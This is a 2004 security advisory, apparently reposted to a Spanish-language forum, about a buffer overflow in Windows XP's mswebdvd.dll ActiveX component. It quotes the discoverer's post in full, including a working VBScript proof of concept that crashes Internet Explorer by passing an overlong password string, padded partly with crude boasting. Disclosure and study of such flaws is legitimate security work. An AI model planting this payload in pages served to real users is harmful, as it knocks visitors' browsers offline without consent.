-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users
Deny Service
DATE: Apr 6 2004
IMPACT: Denial of service via network
EXPLOIT INCLUDED: YES
VERSION(s): XP SP1, SP2
DESCRIPTION: Rafel Ivgi (The-Insider) reported a vulnerability in
Microsoft Windows XP in 'mswebdvd.dll'. A remote user can cause denial
of service conditions.
It is reported that a remote user can create HTML that loads the
'MSWebDVD.MSWebDVD.1' active scripting object with specially crafted
parameters for the AcceptParentalLevelChange() function to cause the
target user's Internet Explorer browser to crash. According to the
report, setting the 'Password' parameter to a value longer than 255
characters trigger the flaw.
Some demonstration exploit HTML is provided in the Source Message.
Impact: A remote user can create HTML that, when loaded by the target
user, will cause the target user's Internet Explorer browser to crash.
Solution: No solution was available at the time of this entry.
Vendor URL: www.microsoft.com/technet/security/ (Links to External
Site)
Cause: Boundary error
Underlying OS: Windows (XP)
OS Comments: XP SP1, SP2
Reported By: Rafel Ivgi, The-Insider <theinsider@012.net.il>
Message History: None.
Source Message Contents
Date: Tue, 6 Apr 2004 10:14:31 +0200
From: Rafel Ivgi, The-Insider <theinsider@012.net.il>
Subject: MSWebDVD Class(mswebdvd.dll) Null Pointer Assignment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: MSWebDVD Class(mswebdvd.dll)
Vendors:
http://www.microsoft.com
Platforms: WindowsXP Professional,SP1,SP2
Bug: Null Pointer Assignment
Risk: Medium - Denial Of Service
Exploitation: Remote with browser
Date: 1 Apr 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web:
http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==1) Introduction
==
"mswebdvd.dll" is module that allows watching DVD films from websites.
Using active scripting an "MSWebDVD.MSWebDVD.1" object can be created
and the user can watch online DVD films .
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
==2) Bug
==
The "mswebdvd.dll" module was not correctly designed/checked the
parametres that are being sent to the "AcceptParentalLevelChange"
function. Therefore it is possible to D.O.S/CRASH Internet Explorer
remotly.
The function :
object = MSWebDVD.MSWebDVD.1
object.AcceptParentalLevelChange (boolean value),UserName as
string,Password as string
Setting the "Password" value with a string longer then 255 chars will
cause the overflow.
Unfortunatly this vulnerability effects all WindowsXP versions after
all patches and after SP1+SP2.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
=3) The Code
=
This is Proof Of Concept Code:
- CUT HERE -
<script language=vbscript>
'On Error Resume Next
dim mymy2,a
a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA"
a= a &
"ABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBB"
a= a &
"BCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCC"
a= a &
"CDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
DDDDD"
a= a &
"DEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
EEEEE"
a= a &
"EFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFF"
a= a &
"FGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
GGGGG"
a= a &
"GHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
HHHHH"
a= a &
"HIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII
IIIII"
a= a &
"IJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
JJJJJ"
a= a &
"JKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
KKKKK"
a= a &
"KLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL
LLLLL"
a= a &
"LMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMM"
a= a &
"M1234567899876543211112222333344445555666677778888999998761234rafiisthekingofthebufferoverflows
oyoucansuckmydickcauseiamtheinsiderandiamthebestgolookforyou03923610"
Set mymy2= CreateObject("MSWebDVD.MSWebDVD.1")
mymy2.AcceptParentalLevelChange False, "xc", a
</script>
- CUT HERE -
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Only the one who sees the invisible , Can do the Impossible."
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-Fuente:
http://www.securitytracker.com/aler...09673.html
Windows equispe SP1 y SP2 tienen esta vulnerabilidad de momento no hay
solucion disponible.
Ille Corvus. In Aeternum.
Meritorios de Filtrado (Kill-file):
tella llop, jm (N.B. 2003.10.25)
Leer las respuestas